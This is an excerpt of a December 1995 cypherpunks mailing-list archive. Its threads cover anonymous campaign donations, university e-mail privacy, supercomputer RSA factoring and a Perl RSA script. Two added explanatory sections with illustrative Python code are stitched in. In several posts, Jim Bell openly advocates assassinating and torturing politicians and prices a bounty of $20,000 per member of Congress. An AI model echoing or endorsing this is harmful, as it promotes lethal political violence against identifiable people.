won't). But then, I'm sure that when Cray Computer finally folded
(has/hasn't?) all that tech just got sold for scrap eh?

Anitro



- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMNSadioZzwIn1bdtAQEgYwF+Nf5Azpeore6OPMNU94CpCawxPcPg8g7T
kLQDY9I5Upk7vCe1dCpHm14g8jRYdSDx
=vjJA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 18 Dec 1995 13:20:06 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Political Cleanup program
In-Reply-To: <m0tROOn-0008yHC@pacifier.com>
Message-ID: <Pine.CVX.3.91.951217185017.21889B@gibbs.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, jim bell wrote:

> 
> It occurs to me that it would be a major advance if a system could be set up
> that would "blind" campaign donations as to their source:  The donor could
> be satisfied that his donation gets to the candidate or cause, but the
> candidate couldn't know  who actually paid the money (and the donor would be
> unable to prove that he made a donation, for example).  Admittedly there are
> a lot of details that need to be worked out, but if this could be
> accomplished it would change politics as we know it.

Just a straight Chaumian style blinding won't work, as there are too many 
covert channels available via both timing and amounts; For example, Joe 
Random Capitalist-Oppressor could arrange to pay a series of relatively 
small amounts with different values in the cents field which could be used 
to confirm their payment (e.g. they could be composed to form a digitally 
signed value of some kind ("pollution rools" or "lung cancer is kool") :)

Sen. Dianne Running-Dog could then look for a matching set of donations 
and confirm that the bribe had in fact been paid. 

There are much better ways of reforming the political system -the 
formation of proper political parties with real programmes (the one good 
thing about the newtoid surge); changing the rules for TV advertising, 
etc. Blinding just makes things worse.

Simon // Introducing Covert Chunnels- the british side has a really slow 
         rate, and the french won't let their citizens use their side..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sethf@MIT.EDU
Date: Mon, 18 Dec 1995 10:23:30 +0800
To: holovacs@styx.ios.com
Subject: Re: Oklahoma University: Is this legal?...
Message-ID: <9512180009.AA18900@frumious-bandersnatch.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


	Going on my past experiences with this sort of situation, I
think the problem is

	a) Oklahoma University is public (seems true from
http://www.uoknor.edu/) 

	b) The state of Oklahoma has an "open public records" law

	so

	c) someone decided that everything stored on the University's
computer system was therefore a "public record" (since the computer is
"owned" by the public), and thus had to be accessible by law.

	This seems to be approximately what's going on:

	"Drafted by Associate Chief Counsel Kurt Ockershauser a year
ago, the policy will make a legal statement that e-mail is running on
state property, Colaw said. He said the policy is not an invasion of privacy."

http://www.uoknor.edu/okdaily/issues/fall1995/dec-7/1-email.processed.html

	Someone needs to explain to him that what he is doing is not
legally required, and perhaps violates the ECPA.

================
Seth Finkelstein
sethf@mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Dec 1995 13:07:44 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Political Cleanup program
Message-ID: <m0tRWN2-0008yUC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:04 PM 12/17/95 -0800, Detweiler wrote:
>
>JB:
>>Politics is traditionally corrupt, it appears, because donors to politicians
>>and political campaigns expect a quid pro quo for their donations.  Various
>>unsatisfactory solutions include campaign spending limits, etc.
>
>I have an unusual view that I've never seen elsewhere: the problem with
>our government is not that money or PACs are involved, but that the system
>does not handle or resolve the conflicts between them very well. in other
>words, in contrary to the current view that all PACs are evil, I think the
>problem is not that we have PACs, but that our current system does not
>balance their demands in some sensible manner.  the system is
>susceptible to corruption. it is conceivable however that there would be
>a system that involves money and politics but still avoids corruption.

Here's a question I have never heard anyone else ask (or answer!).  "What is
the purpose of a PAC?"

To be more specific, a PAC simply seems to be a funnel through which
individual donations flow; why do we need a PAC?  Is it to keep records of
"who's naughty and nice"?  Any contribution that can be made by a PAC could
just as easily be made by one individual.


>>It occurs to me that it would be a major advance if a system could be set up
>>that would "blind" campaign donations as to their source:  The donor could
>>be satisfied that his donation gets to the candidate or cause, but the
>>candidate couldn't know  who actually paid the money (and the donor would be
>>unable to prove that he made a donation, for example).  Admittedly there are
>>a lot of details that need to be worked out, but if this could be
>>accomplished it would change politics as we know it.
>
>what you describe would allow anonymous bribes.

Which, I suggest, is better than a non-anonymous bribe.


> the giver could always


"always"?   Are you sure about that?  

>identify his cash donation "out of band" to the receiver.

It is exactly this that the system I'd propose would prevent.  I realize
that  you may not be able to imagine such a system, but that doesn't mean
that such a system could be designed.  (Before 1975, most of us would not
have been able to imagine public-key encryption, for example.)

A giver could CLAIM to make any sort of donation at all; but if the system
were properly designed he could simply be lying to the  officeholder.

> moreover, other observers
>would not be aware of the relationship. 

Not IMMEDIATELY, perhaps, but eventually the books could be opened, perhaps
as much as years later.  (Let's say, 3 months before the end  of the term of
the politician.)

And the amounts donated could be withheld, with only the total donated reported
every 3 months or so.  (And perhaps only to 1 or 2 significant digits of
accuracy.)  For example, a Senator will be told on January 1, 1996, that up
until that point he's received "about" $1.4 million dollars of donations.
He would not be able to link these donations with any particular claim.
Somebody could claim to have given him "$2000" of donation, which wouldn't
even show up to the accuracy of the amount told the politician.

Further techniques could be  used to disguise the rate of giving.

>why do you think this would be an improvement? 

Easy.  It would remove much of the reason for a politician to treat one
citizen differently from another citizen.  


>to the contrary our current system works hard to require
>the disclosure of who donated what to a candidate, so the candidate's potential
>hidden agendas and ulterior motives can be revealed. seems reasonable to 
>me.

_EVENTUAL_ public disclosure of such information is not inconsistent with
my idea.


>you are probably barking up the wrong tree here on cypherpunks, however,
>because most of the key "insiders" here are convinced that democracy is
>a proven failure, and that in fact government is invariably corrupt and
>oppressive, no matter what the implementation. the "solutions" advocated
>here are chiefly withdrawal and subterfuge.

I don't  disagree with that assessment.  However, that does not mean that I
don't want to make life as difficult for the politicians as possible until
they are swinging from a rope.



>needless to say I disagree with this. I wonder if some day someone will
>invent a "killer app" that doubles as a political governing system.
>it seems to me politics is one of the last most intractable areas of
>human interaction when many others have been harmonized and systematized
>by the information revolution. I suspect it will eventually succumb to
>technological ingenuity as well. the end result would be a government
>that is not perfect, but is at least as good as the population that
>drives it, and no worse. (in contrast today we seem to have a government
>that is no better than the least common denominator).
>
>
>JB, I have to wonder however how your ideas about campaign reform tie into 
>your prior advocation

"Prior"?  It's not "prior."  I haven't changed my previous position one bit.

> of political assassinations as a legitimate form of
>citizen power.  have you given up on the idea of murdering politicians as
>a means of political reform?

Not "political reform."   Political ELIMINATION.  I want to eliminate the
entire  concept of a hierarchical government.


> or are you now just coupling that idea with
>campaign reform to put some new bells and whistles on 
>your overall ideological package?


I repeat my previous statement.  I'm happy to see them squirm before they
are led to the gallows.  Making life as difficult as possible for them is my
goal.  Using technology to disable their normal methods of corruption would
be an excellent start.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Dec 1995 17:08:48 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Political Cleanup program
Message-ID: <m0tRWUD-0008zuC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:03 PM 12/17/95 -0500, you wrote:
>On Sun, 17 Dec 1995, jim bell wrote:
>
>> 
>> It occurs to me that it would be a major advance if a system could be set up
>> that would "blind" campaign donations as to their source:  The donor could
>> be satisfied that his donation gets to the candidate or cause, but the
>> candidate couldn't know  who actually paid the money (and the donor would be
>> unable to prove that he made a donation, for example).  Admittedly there are
>> a lot of details that need to be worked out, but if this could be
>> accomplished it would change politics as we know it.
>
>Just a straight Chaumian style blinding won't work, as there are too many 
>covert channels available via both timing and amounts; For example, Joe 
>Random Capitalist-Oppressor could arrange to pay a series of relatively 
>small amounts with different values in the cents field which could be used 
>to confirm their payment (e.g. they could be composed to form a digitally 
>signed value of some kind ("pollution rools" or "lung cancer is kool") :)

Yes, as I suggested a number of details would be necessary to avoid this.
Reporting only cumulative donations, occasionally over a long period of time
(once every three months, for instance), and even then only approximating
the total number would make  doing such a correlation extremely difficult.


>Sen. Dianne Running-Dog could then look for a matching set of donations 
>and confirm that the bribe had in fact been paid. 
>
>There are much better ways of reforming the political system -the 
>formation of proper political parties with real programmes (the one good 
>thing about the newtoid surge); changing the rules for TV advertising, 
>etc. Blinding just makes things worse.

The blinding needs only be temporary; long enough so the politician can't
act improperly on the donation, but  eventually revealed in enough time to
expose political influence before  the next election.


Besides, I have already proposed what I consider to be a _better_ method of
reforming government.  It's called "Assassination Politics."  Perhaps you've
heard of it.  
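
The exchange above turns on two mechanisms: a covert channel in the cents field of itemized donations, and coarse cumulative reporting as the countermeasure. Both are sketched here as an added example that is not part of any message in the thread; the base-100 encoding, the function names and every amount are constructed for illustration, and the tagged donations are assumed to reach the recipient as one ordered run.

```python
def encode_tag(tag, dollars=25):
    """Hide `tag` in the cents fields of a run of small donations.

    Each donation carries one base-100 digit (00..99) in its cents field;
    the first donation carries the tag length. Amounts are integer cents.
    """
    if not 0 < len(tag) < 100:
        raise ValueError("tag must be 1..99 bytes")
    n = int.from_bytes(tag, "big")
    digits = []
    while n:
        n, digit = divmod(n, 100)
        digits.append(digit)
    digits.reverse()
    return [dollars * 100 + c for c in [len(tag)] + digits]


def decode_tag(amounts):
    """What a recipient with itemized, ordered amounts can recover."""
    cents = [a % 100 for a in amounts]
    length, digits = cents[0], cents[1:]
    n = 0
    for digit in digits:
        n = n * 100 + digit
    return n.to_bytes(length, "big")


def round_sig(value, sig):
    """Round a non-negative integer to `sig` significant digits."""
    width = len(str(value))
    if width <= sig:
        return value
    scale = 10 ** (width - sig)
    return (value + scale // 2) // scale * scale


def quarterly_report(amounts, sig=2):
    """The countermeasure: one cumulative total, coarsely rounded."""
    return round_sig(sum(amounts), sig)


# Constructed ledger: unrelated donations totalling $1,397,000, in cents.
BACKGROUND = [250_000_00, 400_000_00, 310_000_00, 437_000_00]

TAGGED = encode_tag(b"paid")          # six donations of $25.xx
PLAIN = [25_00] * len(TAGGED)         # same donations with .00 cents


def channel_survives(report_a, report_b):
    """The recipient learns something only if the two views differ."""
    return report_a != report_b


if __name__ == "__main__":
    print("itemized view decodes to:", decode_tag(TAGGED))
    print("tagged quarter report   :", quarterly_report(BACKGROUND + TAGGED))
    print("untagged quarter report :", quarterly_report(BACKGROUND + PLAIN))
    print("channel survives rounding:",
          channel_survives(quarterly_report(BACKGROUND + TAGGED),
                           quarterly_report(BACKGROUND + PLAIN)))
```

With itemized amounts the tag decodes exactly; with a two-significant-digit cumulative total the tagged and untagged ledgers are indistinguishable, and so is a ledger with or without a claimed $2000 donation. Timing, the other channel named in the thread, is not modelled.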





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 18 Dec 1995 10:30:51 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Is ths legal?...
In-Reply-To: <ckp8qg_00bkNQ1VJVI@andrew.cmu.edu>
Message-ID: <Pine.CVX.3.91.951217194213.24347A@gibbs.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, Declan B. McCullagh wrote:

> State funding by itself is not sufficient. If that were true, CMU --
> which receives almost half its revenue from the government -- would have
> to behave reasonably. (It doesn't; check out
> http://joc.mit.edu/~joc/cmu.html)


There is some precedent for Federal funding being used to influence the 
behaviour of universities - most notably with anti-discrimination. I 
don't think federal contracts affect this particular area.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Dec 1995 13:26:14 +0800
To: Mike Ingle <inglem@adnetsol.com>
Subject: Re: Political Cleanup program
Message-ID: <m0tRWax-00090aC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I don't consider these two ideas mutually exclusive.  As I pointed out
to Detweiler (under his alias "Nuri") I'm happy to see the politicians
tortured before they are killed.


At 02:48 PM 12/17/95 -0800, you wrote:
>Good ideas, but you're getting soft. I liked the death lotto much better.
>
>							Mike
>
>> Politics is traditionally corrupt, it appears, because donors to politicians
>> and political campaigns expect a quid pro quo for their donations.  Various
>> unsatisfactory solutions include campaign spending limits, etc.
>> 
>> It occurs to me that it would be a major advance if a system could be set up
>> that would "blind" campaign donations as to their source:  The donor could
>> be satisfied that his donation gets to the candidate or cause, but the
>> candidate couldn't know  who actually paid the money (and the donor would be
>> unable to prove that he made a donation, for example).  Admittedly there are
>> a lot of details that need to be worked out, but if this could be
>> accomplished it would change politics as we know it.
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 18 Dec 1995 10:20:39 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Is ths legal?...
In-Reply-To: <ckp8qg_00bkNQ1VJVI@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.91.951217195359.9842A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 17-Dec-95 Re: Is ths legal?... by
> Alan Olsen@teleport.com 
> > In looking at their homepage, it appears to be a state funded school.
> > (There is not a lot of background on the school history or affiliations on
> > their homepage except for a note that it was founded by the territorial
> > legislature a number of years before becoming a state..)
> 
> My understanding is that it is a state school. But for state action to
> be present, there has to be a significant interdependent relationship
> constituting a nexus of state action between the state and the
> university. Like administrators being appointed by agents of the state
> government.
> 
> State funding by itself is not sufficient. If that were true, CMU --
> which receives almost half its revenue from the government -- would have
> to behave reasonably. (It doesn't; check out
> http://joc.mit.edu/~joc/cmu.html)
> 
> -Declan
> (not a lawyer)

Obviously.

> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 18 Dec 1995 17:03:33 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Political Cleanup program
Message-ID: <199512180430.UAA02707@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 12/17/95 -0800, jim bell wrote:
> It occurs to me that it would be a major advance if a system could be set up
> that would "blind" campaign donations as to their source:  The donor could
> be satisfied that his donation gets to the candidate or cause, but the
> candidate couldn't know  who actually paid the money

To make this work, the government would need to prohibit individuals
from campaigning for politicians, taking out ads with political 
consequences, and so on and so forth.   A short step from 
totalitarianism.

A better solution is to move assets and money into forms where
politicians cannot get at them, thus reducing the power of politicians,
and thus the incentive to buy favors from them.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Mon, 18 Dec 1995 15:32:02 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <acfa2f2812021004d314@[205.199.118.202]>
Message-ID: <199512180550.VAA13167@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Correction of one detail:

> tcmay@got.net (Timothy C. May) writes:
> When you've done this, and concluded that RSA-129 could be done in, say, X
> minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
> group), and on to the 1024- and 2048-bit keys. Tell us how many years or
> centuries it will take. (Hint: Rivest and Schneier have done these

The BlackNet key break didn't have any MIT involvement: it was done by
Paul Leyland of Oxford, Arjen Lenstra of Bellcore, Alec Muffet of Sun UK,
and Jim Gillogly of Cypherpunks, RAND, and Gillogly Software in no
particular order.

	Jim Gillogly
	Trewesday, 28 Foreyule S.R. 1995, 05:49




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Mon, 18 Dec 1995 15:32:16 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Political Cleanup program
Message-ID: <199512180553.VAA12388@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 07:35 PM 12/17/95 -0800, you wrote:

>Here's a question I have never heard anyone else ask (or answer!).  "What is
>the purpose of a PAC?"
>
>To be more specific, a PAC simply seems to be a funnel through which
>individual donations flow; why do we need a PAC?  Is it to keep records of
>"who's naughty and nice"?  Any contribution that can be made by a PAC could
>just as easily be made by one individual.

PACs are to politics what mutual funds are to investing - that is, a
mechanism for investors to diversify their holdings, and to allow for the
managers of those holdings to use their expert/specialized knowledge to
achieve better returns (at the cost of some frictional skimmings-off) than
individuals would on their own. 

But I'm not sure what this has to do with C-punks any longer. 
--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 18 Dec 1995 17:23:49 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <acfa2f2812021004d314@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 PM 12/17/95, Anonymous wrote:

>What caught my attention was the architecture.
>
>A "hybrid design linking two supercomputer processors with an
>array of HALF A MILLION inexpensive processors" that were
>designed by the U.S. government laboratory affiliated with the
>NSA. The same chip house that brought us Clipper.

First, half a million chips is not that big a deal...the Connection Machine
had up to 64,000. Very few cryptographic problems of interest to us will be
affected by a mere factor of a million or so.

Second, there was work on a "processor-in-memory" architecture, in
conjunction with a Bowie, Maryland spook-connected company. Perhaps this is
what you are thinking of?

Third, all avenues of continued funding having fallen through, Cray
Computer (not Cray Research, of course) was shut down and assets
liquidated. I haven't heard what's become of Seymour, though. (He is
undoubtedly an asset, but I doubt the Agency would have him liquidated.)

>I've not kept up with the "ultimate" demise that eventually
>befell Cray Computer Company, but the October 16 FBI filing
>on capacity for Digital Telephony got me thinking back to this
>article. 1% seems like a rather huge need for horsepower. And
>what if GAK doesn't fly? And the widespread use of hard crypto
>just keeps increasing?

The tightly-coupled supercomputers are hardly needed for these sorts of
problems.

>This kind of machine could, in theory:
>
>1) Implement ALL Clipper(II) based Key Escrow functionality in
>   silicon (the easy part) AND allow for simultaneous decrypt and
>   surveil of 'who knows how many' Clipper based data streams.

Huh? First, what evidence do you have for this claim? Second, who cares?
Implementing Clipper in a Cray Computer machine--why bother?

As to the claim that a million-processor machine could do this, you need to
work out the math. (If a backdoor exists, or the LEAF has been gotten, a
supercomputer is not needed....)

>2) Implement general RSA based Prime Factoring functionality in
>   silicon (the not so easy part) AND allow massively parallel
>   decrypt and surveil of 'who knows how many' RSA/etc. based
>   data streams.

Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime
has two factors.)

If you mean using supercomputers to brute force the general factoring of an
RSA modulus, this is nonsense. While there may be math shortcuts we don't
yet publicly know about which make factoring easier than we currently
think it is, a mere million or even a billion processors will not make a
dent in the factoring of, say, a 700-digit modulus. See the tables in
Schneier and elsewhere for some estimates of factoring efforts needed.

>3) Implement it all, AND 'on-line' transaction based surveillance
>   via the FBI's 1% capacity infrastructure.

Let's see some numbers. (On second thought, let's not.)


>Chilling... Who needs key escrow (or RSA private keys) when
>you've got a massively parallel prime factoring machine. What if
>GAK was to become a 'non-issue'? How fast do you think a machine
>such as this could factor RSA 129?

Well, do the math. The MIPS-years for the RSA-129 crack were publicized, so
the computation for a million SPARC-equivalent (or even
UltraSPARC-equivalent) can be done.

When you've done this, and concluded that RSA-129 could be done in, say, X
minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
group), and on to the 1024- and 2048-bit keys. Tell us how many years or
centuries it will take. (Hint: Rivest and Schneier have done these
calculations....)


--Tim May, who fears that he's just been trolled by Derek Atkins


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

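Added example (not part of the post above): the "do the math" exercise carried out in Python. It anchors on the published estimate of roughly 5000 MIPS-years for RSA-129 and scales it with the standard heuristic running-time formulas for the quadratic sieve and the number field sieve; the 100 MIPS per processor figure, perfect parallel speed-up and the dropped o(1) terms are assumptions made here.

```python
import math

# Published estimate for the 1994 RSA-129 factorization (quadratic sieve).
RSA129_MIPS_YEARS = 5000.0


def digits_to_bits(digits):
    """Size in bits of a modulus given in decimal digits."""
    return digits * math.log2(10)


RSA129_BITS = digits_to_bits(129)          # about 428.5 bits


def l_qs(bits):
    """Heuristic quadratic sieve cost: exp(sqrt(ln n * ln ln n)), o(1) dropped."""
    ln_n = bits * math.log(2)
    return math.exp(math.sqrt(ln_n * math.log(ln_n)))


def l_gnfs(bits):
    """Heuristic number field sieve cost:
    exp(c * (ln n)^(1/3) * (ln ln n)^(2/3)) with c = (64/9)^(1/3), o(1) dropped."""
    ln_n = bits * math.log(2)
    c = (64.0 / 9.0) ** (1.0 / 3.0)
    return math.exp(c * ln_n ** (1.0 / 3.0) * math.log(ln_n) ** (2.0 / 3.0))


def mips_years(bits, cost=l_gnfs):
    """Effort for a modulus of this size, scaled from the RSA-129 data point.

    Assumption: the ratio of the heuristic cost formulas is a fair scaling
    factor. Anchoring the number field sieve curve on a quadratic sieve
    result is crude and is only meant to give orders of magnitude.
    """
    return RSA129_MIPS_YEARS * cost(bits) / cost(RSA129_BITS)


def wall_clock_years(bits, processors=10**6, mips_each=100.0, cost=l_gnfs):
    """Years of wall-clock time on a machine of `processors` CPUs.

    Assumptions: 100 MIPS per processor (constructed figure) and perfect
    parallel speed-up, both of which favour the attacker.
    """
    return mips_years(bits, cost) / (processors * mips_each)


# Key sizes named in the thread.
SIZES = [
    ("RSA-129", RSA129_BITS),
    ("384-bit", 384),
    ("1024-bit", 1024),
    ("2048-bit", 2048),
    ("700-digit", digits_to_bits(700)),
]


def report(sizes=SIZES):
    """Rows of (label, QS MIPS-years, NFS MIPS-years, NFS wall-clock years)."""
    return [
        (label, mips_years(bits, l_qs), mips_years(bits), wall_clock_years(bits))
        for label, bits in sizes
    ]


if __name__ == "__main__":
    print(f"{'modulus':<10} {'QS MIPS-yr':>12} {'NFS MIPS-yr':>12} {'NFS years, 1e6 CPUs':>20}")
    for label, qs, nfs, years in report():
        print(f"{label:<10} {qs:12.3g} {nfs:12.3g} {years:20.3g}")
```

Under these assumptions RSA-129 falls in under half an hour on the million-processor machine, while a 1024-bit modulus still takes on the order of ten thousand years and the 2048-bit and 700-digit cases are far beyond that.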





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Dec 1995 16:44:30 +0800
To: brew@mtek.com
Subject: Re: Campaign Finance Reform
Message-ID: <m0tRZDX-0008ycC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:43 PM 12/17/95 PST, you wrote:
>On December 17th you wrote:
>
>>To: cypherpunks@toad.com
>>From: jim bell <jimbell@pacifier.com>
>>Subject: Political Cleanup program
>>
>>Politics is traditionally corrupt, it appears, because donors to politicians
>>and political campaigns expect a quid pro quo for their donations.  Various
>>unsatisfactory solutions include campaign spending limits, etc.
>>
>>It occurs to me that it would be a major advance if a system could be set up
>>that would "blind" campaign donations as to their source:  The donor could
>>be satisfied that his donation gets to the candidate or cause, but the
>>candidate couldn't know  who actually paid the money (and the donor would be
>>unable to prove that he made a donation, for example).  Admittedly there are
>>a lot of details that need to be worked out, but if this could be
>>accomplished it would change politics as we know it.
>
>If you'll give it some more thought, Jim, you'll see that it has a loophole
>in it you could drive a semi through. There is no way to keep a donor from
>passing the word to the recipient. No matter how you work out the details,
>it's impossible to keep the information from passing. It could never work.

It is absolutely true that you couldn't stop a person from communicating
claims of a donation to a politician.   But what you COULD do is to ensure
that the donor couldn't PROVE that he made such a donation.  In other words,
_I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good
senator would have no idea that I wasn't telling the truth.  The people who
REALLY made such donations would be helpless.


>Consider a more radical, and possibly workable, solution to the thorny issue
>of campaign finance. If we go back to the root of the problem, it seems
>clear that it is the high cost of a campaign. If a typical campaign were to
>cost a tenth or a twentieth of what it presently costs, we'd have gone a
>long way towards ameliorating the situation. How to do it? Simply ban all
>paid political spot ads - TV, radio, newspaper - all of them. Write it so
>that there's damned little wiggle room - a candidate can use lawn signs, but
>not billboards. They can use personal appearances, but not commercials.
>They can spend all the gas money they want running around their state or
>district, but not a dime for media spots.
>

Well, I have an even better and cheaper solution to the problem of
government and politics.  At an average of $20,000 per Congressman, we could
clean up Washington for $10 million dollars.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 18 Dec 1995 17:12:52 +0800
To: "Richard D. Sheffar" <rick@muskoka.net>
Subject: Re: [NOISE] BIO-MUNITION: gifs of perl-RSA tattoo
In-Reply-To: <Pine.BSD/.3.91.951217221057.9112A-100000@segwun.muskoka.net>
Message-ID: <Pine.LNX.3.91.951217230056.92B-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 17 Dec 1995, Richard D. Sheffar wrote:
 
[Perl RSA sig deleted]
> Okay, I admit it, I don't know everything.
> What does the perl script actually do?
> I saved to file, chmod 777 perly
> tried running the script and kept getting error line 3.
> What does it do, does it encrypt a file or what? What have I done wrong?
> 

The script, when supplied with an exponent (public or secret) and a modulus,
encrypts standard input with the RSA algorithm and sends the result to
standard output.  You can get all the info on this from
http://dcs.ex.ac.uk/~aba/rsa/.  In response to why it doesn't work, did you
check to see if you have a working copy of the UNIX program "dc"?




finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 18 Dec 1995 14:12:08 +0800
To: cypherpunks@toad.com
Subject: IETF draft on data protection via crypto API
Message-ID: <9512180438.AA02976@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


A Revised Internet-Draft is available from the on-line Internet-Drafts 
directories. This draft is a work item of the Common Authentication 
Technology Working Group of the IETF.                                      

       Title     : Independent Data Unit Protection Generic Security 
                   Service Application Program Interface  (IDUP-GSS-API)   
       Author(s) : C. Adams
       Filename  : draft-ietf-cat-idup-gss-03.txt
       Pages     : 35
       Date      : 12/14/1995

The IDUP-GSS-API extends the GSS-API [RFC-1508] for applications requiring 
protection of a generic data unit (such as a file or message) in a way 
which is independent of the protection of any other data unit and 
independent of any concurrent contact with designated "receivers" of the 
data unit.  Thus, it is suitable for applications such as secure electronic
mail where data needs to be protected without any on-line connection with 
the intended recipient(s) of that data.  Subsequent to being protected, the
data unit can be transferred to the recipient(s) - or to an archive - 
perhaps to be processed ("unprotected") only days or years later.          

Internet-Drafts are available by anonymous FTP.  Login with the username
"anonymous" and a password of your e-mail address.  After logging in,
type "cd internet-drafts" and then
     "get draft-ietf-cat-idup-gss-03.txt".
A URL for the Internet-Draft is:
ftp://ds.internic.net/internet-drafts/draft-ietf-cat-idup-gss-03.txt
 
Internet-Drafts directories are located at:	
	                                                
     o  Africa                                   
        Address:  ftp.is.co.za (196.4.160.8)	
	                                                
     o  Europe                                   
        Address:  nic.nordu.net (192.36.148.17)	
        Address:  ftp.nis.garr.it (192.12.192.10)
	                                                
     o  Pacific Rim                              
        Address:  munnari.oz.au (128.250.1.21)	
	                                                
     o  US East Coast                            
        Address:  ds.internic.net (198.49.45.10)	
	                                                
     o  US West Coast                            
        Address:  ftp.isi.edu (128.9.0.32)  	
	                                                
Internet-Drafts are also available by mail.	
	                                                
Send a message to:  mailserv@ds.internic.net. In the body type: 
     "FILE /internet-drafts/draft-ietf-cat-idup-gss-03.txt".
							
NOTE: The mail server at ds.internic.net can return the document in
      MIME-encoded form by using the "mpack" utility.  To use this
      feature, insert the command "ENCODING mime" before the "FILE"
      command.  To decode the response(s), you will need "munpack" or
      a MIME-compliant mail reader.  Different MIME-compliant mail readers
      exhibit different behavior, especially when dealing with
      "multipart" MIME messages (i.e., documents which have been split
      up into multiple messages), so check your local documentation on
      how to manipulate these messages.
							
For questions, please mail to Internet-Drafts@cnri.reston.va.us.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 18 Dec 1995 17:13:32 +0800
To: cypherpunks@toad.com
Subject: Re: [more NOISE] BIO-MUNITION: gifs of perl-RSA tattoo
